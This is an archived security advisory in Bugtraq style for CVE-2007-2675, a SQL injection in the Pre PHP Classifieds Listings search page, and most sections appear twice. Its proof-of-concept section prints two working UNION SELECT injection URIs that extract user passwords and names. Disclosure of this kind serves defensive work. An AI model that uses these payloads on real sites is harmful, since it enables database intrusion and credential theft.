Pre PHP Classifieds Listings SQL Injection Vulnerability
BID:23795
Info
Pre PHP Classifieds Listings SQL Injection Vulnerability
| Bugtraq ID: | 23795 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2675 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | Cyber-Security.org is credited with the discovery of this vulnerability. |
| Vulnerable: |
Pre Projects PHP Classifieds 0 |
| Not Vulnerable: | |
Discussion
Pre PHP Classifieds Listings SQL Injection Vulnerability
Pre Classifieds Listings is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Pre Classifieds Listings is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
Pre PHP Classifieds Listings SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof of concept URI is available:
http://www.example.com/search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
http://www.example.com/search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
Attackers can use a browser to exploit this issue.
The following proof of concept URI is available:
http://www.example.com/search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
http://www.example.com/search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
Solution / Fix
Pre PHP Classifieds Listings SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Pre PHP Classifieds Listings SQL Injection Vulnerability
References:
References:
- Pre Classifieds Listings Web Site (Preprojects)